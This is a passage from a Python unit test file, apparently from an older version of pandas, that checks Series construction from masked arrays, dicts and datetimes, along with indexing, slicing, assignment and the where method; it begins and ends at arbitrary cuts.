exp.index = lrange(10, 20)\n assert_series_equal(result, exp)\n\n def test_constructor_categorical(self):\n cat = pd.Categorical([0, 1, 2, 0, 1, 2], ['a', 'b', 'c'], fastpath=True)\n cat.name = 'foo'\n res = Series(cat)\n self.assertEqual(res.name, cat.name)\n self.assertTrue(res.values.equals(cat))\n\n def test_constructor_maskedarray(self):\n data = ma.masked_all((3,), dtype=float)\n result = Series(data)\n expected = Series([nan, nan, nan])\n assert_series_equal(result, expected)\n\n data[0] = 0.0\n data[2] = 2.0\n index = ['a', 'b', 'c']\n result = Series(data, index=index)\n expected = Series([0.0, nan, 2.0], index=index)\n assert_series_equal(result, expected)\n\n data[1] = 1.0\n result = Series(data, index=index)\n expected = Series([0.0, 1.0, 2.0], index=index)\n assert_series_equal(result, expected)\n\n data = ma.masked_all((3,), dtype=int)\n result = Series(data)\n expected = Series([nan, nan, nan], dtype=float)\n assert_series_equal(result, expected)\n\n data[0] = 0\n data[2] = 2\n index = ['a', 'b', 'c']\n result = Series(data, index=index)\n expected = Series([0, nan, 2], index=index, dtype=float)\n assert_series_equal(result, expected)\n\n data[1] = 1\n result = Series(data, index=index)\n expected = Series([0, 1, 2], index=index, dtype=int)\n assert_series_equal(result, expected)\n\n data = ma.masked_all((3,), dtype=bool)\n result = Series(data)\n expected = Series([nan, nan, nan], dtype=object)\n assert_series_equal(result, expected)\n\n data[0] = True\n data[2] = False\n index = ['a', 'b', 'c']\n result = Series(data, index=index)\n expected = Series([True, nan, False], index=index, dtype=object)\n assert_series_equal(result, expected)\n\n data[1] = True\n result = Series(data, index=index)\n expected = Series([True, True, False], index=index, dtype=bool)\n assert_series_equal(result, expected)\n\n from pandas import tslib\n data = ma.masked_all((3,), dtype='M8[ns]')\n result = Series(data)\n expected = Series([tslib.iNaT, tslib.iNaT, tslib.iNaT], dtype='M8[ns]')\n assert_series_equal(result, expected)\n\n data[0] = datetime(2001, 1, 1)\n data[2] = datetime(2001, 1, 3)\n index = ['a', 'b', 'c']\n result = Series(data, index=index)\n expected = Series([datetime(2001, 1, 1), tslib.iNaT,\n datetime(2001, 1, 3)], index=index, dtype='M8[ns]')\n assert_series_equal(result, expected)\n\n data[1] = datetime(2001, 1, 2)\n result = Series(data, index=index)\n expected = Series([datetime(2001, 1, 1), datetime(2001, 1, 2),\n datetime(2001, 1, 3)], index=index, dtype='M8[ns]')\n assert_series_equal(result, expected)\n\n def test_constructor_default_index(self):\n s = Series([0, 1, 2])\n assert_almost_equal(s.index, np.arange(3))\n\n def test_constructor_corner(self):\n df = tm.makeTimeDataFrame()\n objs = [df, df]\n s = Series(objs, index=[0, 1])\n tm.assert_isinstance(s, Series)\n\n def test_constructor_sanitize(self):\n s = Series(np.array([1., 1., 8.]), dtype='i8')\n self.assertEqual(s.dtype, np.dtype('i8'))\n\n s = Series(np.array([1., 1., np.nan]), copy=True, dtype='i8')\n self.assertEqual(s.dtype, np.dtype('f8'))\n\n def test_constructor_pass_none(self):\n s = Series(None, index=lrange(5))\n self.assertEqual(s.dtype, np.float64)\n\n s = Series(None, index=lrange(5), dtype=object)\n self.assertEqual(s.dtype, np.object_)\n\n # GH 7431\n # inference on the index\n s = Series(index=np.array([None]))\n expected = Series(index=Index([None]))\n assert_series_equal(s,expected)\n\n def test_constructor_cast(self):\n self.assertRaises(ValueError, Series, ['a', 'b', 'c'], dtype=float)\n\n def test_constructor_dtype_nocast(self):\n # 1572\n s = Series([1, 2, 3])\n\n s2 = Series(s, dtype=np.int64)\n\n s2[1] = 5\n self.assertEqual(s[1], 5)\n\n def test_constructor_dtype_datetime64(self):\n import pandas.tslib as tslib\n\n s = Series(tslib.iNaT, dtype='M8[ns]', index=lrange(5))\n self.assertTrue(isnull(s).all())\n\n # in theory this should be all nulls, but since\n # we are not specifying a dtype is ambiguous\n s = Series(tslib.iNaT, index=lrange(5))\n self.assertFalse(isnull(s).all())\n\n s = Series(nan, dtype='M8[ns]', index=lrange(5))\n self.assertTrue(isnull(s).all())\n\n s = Series([datetime(2001, 1, 2, 0, 0), tslib.iNaT], dtype='M8[ns]')\n self.assertTrue(isnull(s[1]))\n self.assertEqual(s.dtype, 'M8[ns]')\n\n s = Series([datetime(2001, 1, 2, 0, 0), nan], dtype='M8[ns]')\n self.assertTrue(isnull(s[1]))\n self.assertEqual(s.dtype, 'M8[ns]')\n\n # GH3416\n dates = [\n np.datetime64(datetime(2013, 1, 1)),\n np.datetime64(datetime(2013, 1, 2)),\n np.datetime64(datetime(2013, 1, 3)),\n ]\n\n s = Series(dates)\n self.assertEqual(s.dtype, 'M8[ns]')\n\n s.ix[0] = np.nan\n self.assertEqual(s.dtype, 'M8[ns]')\n\n # invalid astypes\n for t in ['s', 'D', 'us', 'ms']:\n self.assertRaises(TypeError, s.astype, 'M8[%s]' % t)\n\n # GH3414 related\n self.assertRaises(TypeError, lambda x: Series(\n Series(dates).astype('int') / 1000000, dtype='M8[ms]'))\n self.assertRaises(\n TypeError, lambda x: Series(dates, dtype='datetime64'))\n\n # invalid dates can be help as object\n result = Series([datetime(2,1,1)])\n self.assertEqual(result[0], datetime(2,1,1,0,0))\n\n result = Series([datetime(3000,1,1)])\n self.assertEqual(result[0], datetime(3000,1,1,0,0))\n\n # don't mix types\n result = Series([ Timestamp('20130101'), 1],index=['a','b'])\n self.assertEqual(result['a'], Timestamp('20130101'))\n self.assertEqual(result['b'], 1)\n\n # GH6529\n # coerce datetime64 non-ns properly\n dates = date_range('01-Jan-2015', '01-Dec-2015', freq='M')\n values2 = dates.view(np.ndarray).astype('datetime64[ns]')\n expected = Series(values2, dates)\n\n for dtype in ['s', 'D', 'ms', 'us', 'ns']:\n values1 = dates.view(np.ndarray).astype('M8[{0}]'.format(dtype))\n result = Series(values1, dates)\n assert_series_equal(result,expected)\n\n # leave datetime.date alone\n dates2 = np.array([d.date() for d in dates.to_pydatetime()],\n dtype=object)\n series1 = Series(dates2, dates)\n self.assert_numpy_array_equal(series1.values,dates2)\n self.assertEqual(series1.dtype,object)\n\n # these will correctly infer a datetime\n s = Series([None, pd.NaT, '2013-08-05 15:30:00.000001'])\n self.assertEqual(s.dtype,'datetime64[ns]')\n s = Series([np.nan, pd.NaT, '2013-08-05 15:30:00.000001'])\n self.assertEqual(s.dtype,'datetime64[ns]')\n s = Series([pd.NaT, None, '2013-08-05 15:30:00.000001'])\n self.assertEqual(s.dtype,'datetime64[ns]')\n s = Series([pd.NaT, np.nan, '2013-08-05 15:30:00.000001'])\n self.assertEqual(s.dtype,'datetime64[ns]')\n\n # tz-aware (UTC and other tz's)\n # GH 8411\n dr = date_range('20130101',periods=3)\n self.assertTrue(Series(dr).iloc[0].tz is None)\n dr = date_range('20130101',periods=3,tz='UTC')\n self.assertTrue(str(Series(dr).iloc[0].tz) == 'UTC')\n dr = date_range('20130101',periods=3,tz='US/Eastern')\n self.assertTrue(str(Series(dr).iloc[0].tz) == 'US/Eastern')\n\n def test_constructor_periodindex(self):\n # GH7932\n # converting a PeriodIndex when put in a Series\n\n pi = period_range('20130101',periods=5,freq='D')\n s = Series(pi)\n expected = Series(pi.asobject)\n assert_series_equal(s, expected)\n\n def test_constructor_dict(self):\n d = {'a': 0., 'b': 1., 'c': 2.}\n result = Series(d, index=['b', 'c', 'd', 'a'])\n expected = Series([1, 2, nan, 0], index=['b', 'c', 'd', 'a'])\n assert_series_equal(result, expected)\n\n pidx = tm.makePeriodIndex(100)\n d = {pidx[0]: 0, pidx[1]: 1}\n result = Series(d, index=pidx)\n expected = Series(np.nan, pidx)\n expected.ix[0] = 0\n expected.ix[1] = 1\n assert_series_equal(result, expected)\n\n def test_constructor_dict_multiindex(self):\n check = lambda result, expected: tm.assert_series_equal(\n result, expected, check_dtype=True, check_index_type=True,\n check_series_type=True)\n d = {('a', 'a'): 0., ('b', 'a'): 1., ('b', 'c'): 2.}\n _d = sorted(d.items())\n ser = Series(d)\n expected = Series([x[1] for x in _d],\n index=MultiIndex.from_tuples([x[0] for x in _d]))\n check(ser, expected)\n\n d['z'] = 111.\n _d.insert(0, ('z', d['z']))\n ser = Series(d)\n expected = Series(\n [x[1] for x in _d],\n index=Index([x[0] for x in _d], tupleize_cols=False))\n ser = ser.reindex(index=expected.index)\n check(ser, expected)\n\n def test_constructor_subclass_dict(self):\n data = tm.TestSubDict((x, 10.0 * x) for x in range(10))\n series = Series(data)\n refseries = Series(dict(compat.iteritems(data)))\n assert_series_equal(refseries, series)\n\n def test_orderedDict_ctor(self):\n # GH3283\n import pandas\n import random\n data = OrderedDict([('col%s' % i, random.random()) for i in range(12)])\n s = pandas.Series(data)\n self.assertTrue(all(s.values == list(data.values())))\n\n def test_orderedDict_subclass_ctor(self):\n # GH3283\n import pandas\n import random\n\n class A(OrderedDict):\n pass\n data = A([('col%s' % i, random.random()) for i in range(12)])\n s = pandas.Series(data)\n self.assertTrue(all(s.values == list(data.values())))\n\n def test_constructor_list_of_tuples(self):\n data = [(1, 1), (2, 2), (2, 3)]\n s = Series(data)\n self.assertEqual(list(s), data)\n\n def test_constructor_tuple_of_tuples(self):\n data = ((1, 1), (2, 2), (2, 3))\n s = Series(data)\n self.assertEqual(tuple(s), data)\n\n def test_constructor_set(self):\n values = set([1, 2, 3, 4, 5])\n self.assertRaises(TypeError, Series, values)\n values = frozenset(values)\n self.assertRaises(TypeError, Series, values)\n\n def test_fromDict(self):\n data = {'a': 0, 'b': 1, 'c': 2, 'd': 3}\n\n series = Series(data)\n self.assertTrue(tm.is_sorted(series.index))\n\n data = {'a': 0, 'b': '1', 'c': '2', 'd': datetime.now()}\n series = Series(data)\n self.assertEqual(series.dtype, np.object_)\n\n data = {'a': 0, 'b': '1', 'c': '2', 'd': '3'}\n series = Series(data)\n self.assertEqual(series.dtype, np.object_)\n\n data = {'a': '0', 'b': '1'}\n series = Series(data, dtype=float)\n self.assertEqual(series.dtype, np.float64)\n\n def test_setindex(self):\n # wrong type\n series = self.series.copy()\n self.assertRaises(TypeError, setattr, series, 'index', None)\n\n # wrong length\n series = self.series.copy()\n self.assertRaises(Exception, setattr, series, 'index',\n np.arange(len(series) - 1))\n\n # works\n series = self.series.copy()\n series.index = np.arange(len(series))\n tm.assert_isinstance(series.index, Index)\n\n def test_array_finalize(self):\n pass\n\n def test_pop(self):\n # GH 6600\n df = DataFrame({\n 'A': 0,\n 'B': np.arange(5,dtype='int64'),\n 'C': 0,\n })\n k = df.iloc[4]\n\n result = k.pop('B')\n self.assertEqual(result, 4)\n\n expected = Series([0,0],index=['A','C'])\n assert_series_equal(k, expected)\n\n def test_not_hashable(self):\n s_empty = Series()\n s = Series([1])\n self.assertRaises(TypeError, hash, s_empty)\n self.assertRaises(TypeError, hash, s)\n\n def test_fromValue(self):\n\n nans = Series(np.NaN, index=self.ts.index)\n self.assertEqual(nans.dtype, np.float_)\n self.assertEqual(len(nans), len(self.ts))\n\n strings = Series('foo', index=self.ts.index)\n self.assertEqual(strings.dtype, np.object_)\n self.assertEqual(len(strings), len(self.ts))\n\n d = datetime.now()\n dates = Series(d, index=self.ts.index)\n self.assertEqual(dates.dtype, 'M8[ns]')\n self.assertEqual(len(dates), len(self.ts))\n\n def test_contains(self):\n tm.assert_contains_all(self.ts.index, self.ts)\n\n def test_pickle(self):\n unp_series = self._pickle_roundtrip(self.series)\n unp_ts = self._pickle_roundtrip(self.ts)\n assert_series_equal(unp_series, self.series)\n assert_series_equal(unp_ts, self.ts)\n\n def _pickle_roundtrip(self, obj):\n\n with ensure_clean() as path:\n obj.to_pickle(path)\n unpickled = pd.read_pickle(path)\n return unpickled\n\n def test_getitem_get(self):\n idx1 = self.series.index[5]\n idx2 = self.objSeries.index[5]\n\n self.assertEqual(self.series[idx1], self.series.get(idx1))\n self.assertEqual(self.objSeries[idx2], self.objSeries.get(idx2))\n\n self.assertEqual(self.series[idx1], self.series[5])\n self.assertEqual(self.objSeries[idx2], self.objSeries[5])\n\n self.assertEqual(\n self.series.get(-1), self.series.get(self.series.index[-1]))\n self.assertEqual(self.series[5], self.series.get(self.series.index[5]))\n\n # missing\n d = self.ts.index[0] - datetools.bday\n self.assertRaises(KeyError, self.ts.__getitem__, d)\n\n # None\n # GH 5652\n for s in [Series(), Series(index=list('abc'))]:\n result = s.get(None)\n self.assertIsNone(result)\n\n def test_iget(self):\n s = Series(np.random.randn(10), index=lrange(0, 20, 2))\n for i in range(len(s)):\n result = s.iget(i)\n exp = s[s.index[i]]\n assert_almost_equal(result, exp)\n\n # pass a slice\n result = s.iget(slice(1, 3))\n expected = s.ix[2:4]\n assert_series_equal(result, expected)\n\n # test slice is a view\n result[:] = 0\n self.assertTrue((s[1:3] == 0).all())\n\n # list of integers\n result = s.iget([0, 2, 3, 4, 5])\n expected = s.reindex(s.index[[0, 2, 3, 4, 5]])\n assert_series_equal(result, expected)\n\n def test_iget_nonunique(self):\n s = Series([0, 1, 2], index=[0, 1, 0])\n self.assertEqual(s.iget(2), 2)\n\n def test_getitem_regression(self):\n s = Series(lrange(5), index=lrange(5))\n result = s[lrange(5)]\n assert_series_equal(result, s)\n\n def test_getitem_setitem_slice_bug(self):\n s = Series(lrange(10), lrange(10))\n result = s[-12:]\n assert_series_equal(result, s)\n\n result = s[-7:]\n assert_series_equal(result, s[3:])\n\n result = s[:-12]\n assert_series_equal(result, s[:0])\n\n s = Series(lrange(10), lrange(10))\n s[-12:] = 0\n self.assertTrue((s == 0).all())\n\n s[:-12] = 5\n self.assertTrue((s == 0).all())\n\n def test_getitem_int64(self):\n idx = np.int64(5)\n self.assertEqual(self.ts[idx], self.ts[5])\n\n def test_getitem_fancy(self):\n slice1 = self.series[[1, 2, 3]]\n slice2 = self.objSeries[[1, 2, 3]]\n self.assertEqual(self.series.index[2], slice1.index[1])\n self.assertEqual(self.objSeries.index[2], slice2.index[1])\n self.assertEqual(self.series[2], slice1[1])\n self.assertEqual(self.objSeries[2], slice2[1])\n\n def test_getitem_boolean(self):\n s = self.series\n mask = s > s.median()\n\n # passing list is OK\n result = s[list(mask)]\n expected = s[mask]\n assert_series_equal(result, expected)\n self.assert_numpy_array_equal(result.index, s.index[mask])\n\n def test_getitem_boolean_empty(self):\n s = Series([], dtype=np.int64)\n s.index.name = 'index_name'\n s = s[s.isnull()]\n self.assertEqual(s.index.name, 'index_name')\n self.assertEqual(s.dtype, np.int64)\n\n # GH5877\n # indexing with empty series\n s = Series(['A', 'B'])\n expected = Series(np.nan,index=['C'],dtype=object)\n result = s[Series(['C'], dtype=object)]\n assert_series_equal(result, expected)\n\n s = Series(['A', 'B'])\n expected = Series(dtype=object)\n result = s[Series([], dtype=object)]\n assert_series_equal(result, expected)\n\n # invalid because of the boolean indexer\n # that's empty or not-aligned\n def f():\n s[Series([], dtype=bool)]\n self.assertRaises(IndexingError, f)\n\n def f():\n s[Series([True], dtype=bool)]\n self.assertRaises(IndexingError, f)\n\n def test_getitem_generator(self):\n gen = (x > 0 for x in self.series)\n result = self.series[gen]\n result2 = self.series[iter(self.series > 0)]\n expected = self.series[self.series > 0]\n assert_series_equal(result, expected)\n assert_series_equal(result2, expected)\n\n def test_getitem_boolean_object(self):\n # using column from DataFrame\n\n s = self.series\n mask = s > s.median()\n omask = mask.astype(object)\n\n # getitem\n result = s[omask]\n expected = s[mask]\n assert_series_equal(result, expected)\n\n # setitem\n s2 = s.copy()\n cop = s.copy()\n cop[omask] = 5\n s2[mask] = 5\n assert_series_equal(cop, s2)\n\n # nans raise exception\n omask[5:10] = np.nan\n self.assertRaises(Exception, s.__getitem__, omask)\n self.assertRaises(Exception, s.__setitem__, omask, 5)\n\n def test_getitem_setitem_boolean_corner(self):\n ts = self.ts\n mask_shifted = ts.shift(1, freq=datetools.bday) > ts.median()\n\n # these used to raise...??\n\n self.assertRaises(Exception, ts.__getitem__, mask_shifted)\n self.assertRaises(Exception, ts.__setitem__, mask_shifted, 1)\n #ts[mask_shifted]\n #ts[mask_shifted] = 1\n\n self.assertRaises(Exception, ts.ix.__getitem__, mask_shifted)\n self.assertRaises(Exception, ts.ix.__setitem__, mask_shifted, 1)\n #ts.ix[mask_shifted]\n #ts.ix[mask_shifted] = 2\n\n def test_getitem_setitem_slice_integers(self):\n s = Series(np.random.randn(8), index=[2, 4, 6, 8, 10, 12, 14, 16])\n\n result = s[:4]\n expected = s.reindex([2, 4, 6, 8])\n assert_series_equal(result, expected)\n\n s[:4] = 0\n self.assertTrue((s[:4] == 0).all())\n self.assertTrue(not (s[4:] == 0).any())\n\n def test_getitem_out_of_bounds(self):\n # don't segfault, GH #495\n self.assertRaises(IndexError, self.ts.__getitem__, len(self.ts))\n\n # GH #917\n s = Series([])\n self.assertRaises(IndexError, s.__getitem__, -1)\n\n def test_getitem_setitem_integers(self):\n # caused bug without test\n s = Series([1, 2, 3], ['a', 'b', 'c'])\n\n self.assertEqual(s.ix[0], s['a'])\n s.ix[0] = 5\n self.assertAlmostEqual(s['a'], 5)\n\n def test_getitem_box_float64(self):\n value = self.ts[5]\n tm.assert_isinstance(value, np.float64)\n\n def test_getitem_ambiguous_keyerror(self):\n s = Series(lrange(10), index=lrange(0, 20, 2))\n self.assertRaises(KeyError, s.__getitem__, 1)\n self.assertRaises(KeyError, s.ix.__getitem__, 1)\n\n def test_getitem_unordered_dup(self):\n obj = Series(lrange(5), index=['c', 'a', 'a', 'b', 'b'])\n self.assertTrue(np.isscalar(obj['c']))\n self.assertEqual(obj['c'], 0)\n\n def test_getitem_dups_with_missing(self):\n\n # breaks reindex, so need to use .ix internally\n # GH 4246\n s = Series([1, 2, 3, 4], ['foo', 'bar', 'foo', 'bah'])\n expected = s.ix[['foo', 'bar', 'bah', 'bam']]\n result = s[['foo', 'bar', 'bah', 'bam']]\n assert_series_equal(result, expected)\n\n def test_getitem_dups(self):\n s = Series(range(5),index=['A','A','B','C','C'],dtype=np.int64)\n expected = Series([3,4],index=['C','C'],dtype=np.int64)\n result = s['C']\n assert_series_equal(result, expected)\n\n def test_getitem_dataframe(self):\n rng = list(range(10))\n s = pd.Series(10, index=rng)\n df = pd.DataFrame(rng, index=rng)\n self.assertRaises(TypeError, s.__getitem__, df>5)\n\n def test_setitem_ambiguous_keyerror(self):\n s = Series(lrange(10), index=lrange(0, 20, 2))\n\n # equivalent of an append\n s2 = s.copy()\n s2[1] = 5\n expected = s.append(Series([5],index=[1]))\n assert_series_equal(s2,expected)\n\n s2 = s.copy()\n s2.ix[1] = 5\n expected = s.append(Series([5],index=[1]))\n assert_series_equal(s2,expected)\n\n def test_setitem_float_labels(self):\n # note labels are floats\n s = Series(['a', 'b', 'c'], index=[0, 0.5, 1])\n tmp = s.copy()\n\n s.ix[1] = 'zoo'\n tmp.iloc[2] = 'zoo'\n\n assert_series_equal(s, tmp)\n\n def test_slice(self):\n numSlice = self.series[10:20]\n numSliceEnd = self.series[-10:]\n objSlice = self.objSeries[10:20]\n\n self.assertNotIn(self.series.index[9], numSlice.index)\n self.assertNotIn(self.objSeries.index[9], objSlice.index)\n\n self.assertEqual(len(numSlice), len(numSlice.index))\n self.assertEqual(self.series[numSlice.index[0]],\n numSlice[numSlice.index[0]])\n\n self.assertEqual(numSlice.index[1], self.series.index[11])\n\n self.assertTrue(tm.equalContents(numSliceEnd,\n np.array(self.series)[-10:]))\n\n # test return view\n sl = self.series[10:20]\n sl[:] = 0\n self.assertTrue((self.series[10:20] == 0).all())\n\n def test_slice_can_reorder_not_uniquely_indexed(self):\n s = Series(1, index=['a', 'a', 'b', 'b', 'c'])\n result = s[::-1] # it works!\n\n def test_slice_float_get_set(self):\n\n self.assertRaises(TypeError, lambda : self.ts[4.0:10.0])\n def f():\n self.ts[4.0:10.0] = 0\n self.assertRaises(TypeError, f)\n\n self.assertRaises(TypeError, self.ts.__getitem__, slice(4.5, 10.0))\n self.assertRaises(TypeError, self.ts.__setitem__, slice(4.5, 10.0), 0)\n\n def test_slice_floats2(self):\n s = Series(np.random.rand(10), index=np.arange(10, 20, dtype=float))\n\n self.assertEqual(len(s.ix[12.0:]), 8)\n self.assertEqual(len(s.ix[12.5:]), 7)\n\n i = np.arange(10, 20, dtype=float)\n i[2] = 12.2\n s.index = i\n self.assertEqual(len(s.ix[12.0:]), 8)\n self.assertEqual(len(s.ix[12.5:]), 7)\n\n def test_slice_float64(self):\n\n values = np.arange(10., 50., 2)\n index = Index(values)\n\n start, end = values[[5, 15]]\n\n s = Series(np.random.randn(20), index=index)\n\n result = s[start:end]\n expected = s.iloc[5:16]\n assert_series_equal(result, expected)\n\n result = s.loc[start:end]\n assert_series_equal(result, expected)\n\n df = DataFrame(np.random.randn(20, 3), index=index)\n\n result = df[start:end]\n expected = df.iloc[5:16]\n tm.assert_frame_equal(result, expected)\n\n result = df.loc[start:end]\n tm.assert_frame_equal(result, expected)\n\n def test_setitem(self):\n self.ts[self.ts.index[5]] = np.NaN\n self.ts[[1, 2, 17]] = np.NaN\n self.ts[6] = np.NaN\n self.assertTrue(np.isnan(self.ts[6]))\n self.assertTrue(np.isnan(self.ts[2]))\n self.ts[np.isnan(self.ts)] = 5\n self.assertFalse(np.isnan(self.ts[2]))\n\n # caught this bug when writing tests\n series = Series(tm.makeIntIndex(20).astype(float),\n index=tm.makeIntIndex(20))\n\n series[::2] = 0\n self.assertTrue((series[::2] == 0).all())\n\n # set item that's not contained\n s = self.series.copy()\n s['foobar'] = 1\n expected = self.series.append(Series([1],index=['foobar']))\n assert_series_equal(s,expected)\n\n def test_setitem_dtypes(self):\n\n # change dtypes\n # GH 4463\n expected = Series([np.nan,2,3])\n\n s = Series([1,2,3])\n s.iloc[0] = np.nan\n assert_series_equal(s,expected)\n\n s = Series([1,2,3])\n s.loc[0] = np.nan\n assert_series_equal(s,expected)\n\n s = Series([1,2,3])\n s[0] = np.nan\n assert_series_equal(s,expected)\n\n s = Series([False])\n s.loc[0] = np.nan\n assert_series_equal(s,Series([np.nan]))\n\n s = Series([False,True])\n s.loc[0] = np.nan\n assert_series_equal(s,Series([np.nan,1.0]))\n\n def test_set_value(self):\n idx = self.ts.index[10]\n res = self.ts.set_value(idx, 0)\n self.assertIs(res, self.ts)\n self.assertEqual(self.ts[idx], 0)\n\n # equiv\n s = self.series.copy()\n res = s.set_value('foobar', 0)\n self.assertIs(res, s)\n self.assertEqual(res.index[-1], 'foobar')\n self.assertEqual(res['foobar'], 0)\n\n s = self.series.copy()\n s.loc['foobar'] = 0\n self.assertEqual(s.index[-1], 'foobar')\n self.assertEqual(s['foobar'], 0)\n\n def test_setslice(self):\n sl = self.ts[5:20]\n self.assertEqual(len(sl), len(sl.index))\n self.assertTrue(sl.index.is_unique)\n\n def test_basic_getitem_setitem_corner(self):\n # invalid tuples, e.g. self.ts[:, None] vs. self.ts[:, 2]\n with tm.assertRaisesRegexp(ValueError, 'tuple-index'):\n self.ts[:, 2]\n with tm.assertRaisesRegexp(ValueError, 'tuple-index'):\n self.ts[:, 2] = 2\n\n # weird lists. [slice(0, 5)] will work but not two slices\n result = self.ts[[slice(None, 5)]]\n expected = self.ts[:5]\n assert_series_equal(result, expected)\n\n # OK\n self.assertRaises(Exception, self.ts.__getitem__,\n [5, slice(None, None)])\n self.assertRaises(Exception, self.ts.__setitem__,\n [5, slice(None, None)], 2)\n\n def test_reshape_non_2d(self):\n # GH 4554\n x = Series(np.random.random(201), name='x')\n self.assertTrue(x.reshape(x.shape,) is x)\n\n # GH 2719\n a = Series([1, 2, 3, 4])\n result = a.reshape(2, 2)\n expected = a.values.reshape(2, 2)\n np.testing.assert_array_equal(result, expected)\n self.assertTrue(type(result) is type(expected))\n\n def test_reshape_2d_return_array(self):\n x = Series(np.random.random(201), name='x')\n result = x.reshape((-1, 1))\n self.assertNotIsInstance(result, Series)\n\n result2 = np.reshape(x, (-1, 1))\n self.assertNotIsInstance(result2, Series)\n\n result = x[:, None]\n expected = x.reshape((-1, 1))\n assert_almost_equal(result, expected)\n\n def test_basic_getitem_with_labels(self):\n indices = self.ts.index[[5, 10, 15]]\n\n result = self.ts[indices]\n expected = self.ts.reindex(indices)\n assert_series_equal(result, expected)\n\n result = self.ts[indices[0]:indices[2]]\n expected = self.ts.ix[indices[0]:indices[2]]\n assert_series_equal(result, expected)\n\n # integer indexes, be careful\n s = Series(np.random.randn(10), index=lrange(0, 20, 2))\n inds = [0, 2, 5, 7, 8]\n arr_inds = np.array([0, 2, 5, 7, 8])\n result = s[inds]\n expected = s.reindex(inds)\n assert_series_equal(result, expected)\n\n result = s[arr_inds]\n expected = s.reindex(arr_inds)\n assert_series_equal(result, expected)\n\n def test_basic_setitem_with_labels(self):\n indices = self.ts.index[[5, 10, 15]]\n\n cp = self.ts.copy()\n exp = self.ts.copy()\n cp[indices] = 0\n exp.ix[indices] = 0\n assert_series_equal(cp, exp)\n\n cp = self.ts.copy()\n exp = self.ts.copy()\n cp[indices[0]:indices[2]] = 0\n exp.ix[indices[0]:indices[2]] = 0\n assert_series_equal(cp, exp)\n\n # integer indexes, be careful\n s = Series(np.random.randn(10), index=lrange(0, 20, 2))\n inds = [0, 4, 6]\n arr_inds = np.array([0, 4, 6])\n\n cp = s.copy()\n exp = s.copy()\n s[inds] = 0\n s.ix[inds] = 0\n assert_series_equal(cp, exp)\n\n cp = s.copy()\n exp = s.copy()\n s[arr_inds] = 0\n s.ix[arr_inds] = 0\n assert_series_equal(cp, exp)\n\n inds_notfound = [0, 4, 5, 6]\n arr_inds_notfound = np.array([0, 4, 5, 6])\n self.assertRaises(Exception, s.__setitem__, inds_notfound, 0)\n self.assertRaises(Exception, s.__setitem__, arr_inds_notfound, 0)\n\n def test_ix_getitem(self):\n inds = self.series.index[[3, 4, 7]]\n assert_series_equal(self.series.ix[inds], self.series.reindex(inds))\n assert_series_equal(self.series.ix[5::2], self.series[5::2])\n\n # slice with indices\n d1, d2 = self.ts.index[[5, 15]]\n result = self.ts.ix[d1:d2]\n expected = self.ts.truncate(d1, d2)\n assert_series_equal(result, expected)\n\n # boolean\n mask = self.series > self.series.median()\n assert_series_equal(self.series.ix[mask], self.series[mask])\n\n # ask for index value\n self.assertEqual(self.ts.ix[d1], self.ts[d1])\n self.assertEqual(self.ts.ix[d2], self.ts[d2])\n\n def test_ix_getitem_not_monotonic(self):\n d1, d2 = self.ts.index[[5, 15]]\n\n ts2 = self.ts[::2][[1, 2, 0]]\n\n self.assertRaises(KeyError, ts2.ix.__getitem__, slice(d1, d2))\n self.assertRaises(KeyError, ts2.ix.__setitem__, slice(d1, d2), 0)\n\n def test_ix_getitem_setitem_integer_slice_keyerrors(self):\n s = Series(np.random.randn(10), index=lrange(0, 20, 2))\n\n # this is OK\n cp = s.copy()\n cp.ix[4:10] = 0\n self.assertTrue((cp.ix[4:10] == 0).all())\n\n # so is this\n cp = s.copy()\n cp.ix[3:11] = 0\n self.assertTrue((cp.ix[3:11] == 0).values.all())\n\n result = s.ix[4:10]\n result2 = s.ix[3:11]\n expected = s.reindex([4, 6, 8, 10])\n\n assert_series_equal(result, expected)\n assert_series_equal(result2, expected)\n\n # non-monotonic, raise KeyError\n s2 = s.iloc[lrange(5) + lrange(5, 10)[::-1]]\n self.assertRaises(KeyError, s2.ix.__getitem__, slice(3, 11))\n self.assertRaises(KeyError, s2.ix.__setitem__, slice(3, 11), 0)\n\n def test_ix_getitem_iterator(self):\n idx = iter(self.series.index[:10])\n result = self.series.ix[idx]\n assert_series_equal(result, self.series[:10])\n\n def test_where(self):\n s = Series(np.random.randn(5))\n cond = s > 0\n\n rs = s.where(cond).dropna()\n rs2 = s[cond]\n assert_series_equal(rs, rs2)\n\n rs = s.where(cond, -s)\n assert_series_equal(rs, s.abs())\n\n rs = s.where(cond)\n assert(s.shape == rs.shape)\n assert(rs is not s)\n\n # test alignment\n cond = Series([True,False,False,True,False],index=s.index)\n s2 = -(s.abs())\n\n expected = s2[cond].reindex(s2.index[:3]).reindex(s2.index)\n rs = s2.where(cond[:3])\n assert_series_equal(rs, expected)\n\n expected = s2.abs()\n expected.ix[0] = s2[0]\n rs = s2.where(cond[:3], -s2)\n assert_series_equal(rs, expected)\n\n self.assertRaises(ValueError, s.where, 1)\n self.assertRaises(ValueError, s.where, cond[:3].values, -s)\n\n # GH 2745\n s = Series([1, 2])\n s[[True, False]] = [0, 1]\n expected = Series([0, 2])\n assert_series_equal(s, expected)\n\n # failures\n self.assertRaises(\n ValueError, s.__setitem__, tuple([[[True, False]]]), [0, 2, 3])\n self.assertRaises(\n ValueError, s.__setitem__, tuple([[[True, False]]]), [])\n\n # unsafe dtype changes\n for dtype in [np.int8, np.int16, np.int32, np.int64, np.float16, np.float32, np.float64]:\n s = Series(np.arange(10), dtype=dtype)\n mask = s < 5\n s[mask] = lrange(2, 7)\n expected = Series(lrange(2, 7) + lrange(5, 10), dtype=dtype)\n assert_series_equal(s, expected)\n self.assertEqual(s.dtype, expected.dtype)\n\n # these are allowed operations, but are upcasted\n for dtype in [np.int64, np.float64]:\n s = Series(np.arange(10), dtype=dtype)\n mask = s < 5\n values = [2.5, 3.5, 4.5, 5.5, 6.5]\n s[mask] = values\n expected = Series(values + lrange(5, 10), dtype='float64')\n assert_series_equal(s, expected)\n self.assertEqual(s.dtype, expected.dtype)\n\n # can't do these as we are forced to change the itemsize of the input\n # to something we cannot\n for dtype in [np.int8, np.int16, np.int32, np.float16, np.float32]:\n s = Series(np.arange(10), dtype=dtype)\n mask = s < 5\n values = [2.5, 3.5, 4.5, 5.5, 6.5]\n self.assertRaises(Exception, s.__setitem__, tuple(mask), values)\n\n # GH3235\n s = Series(np.arange(10), dtype='int64')\n mask = s < 5\n s[mask] = lrange(2, 7)\n expected = Series(lrange(2, 7) + lrange(5, 10), dtype='int64')\n assert_series_equal(s, expected)\n self.assertEqual(s.dtype, expected.dtype)\n\n s = 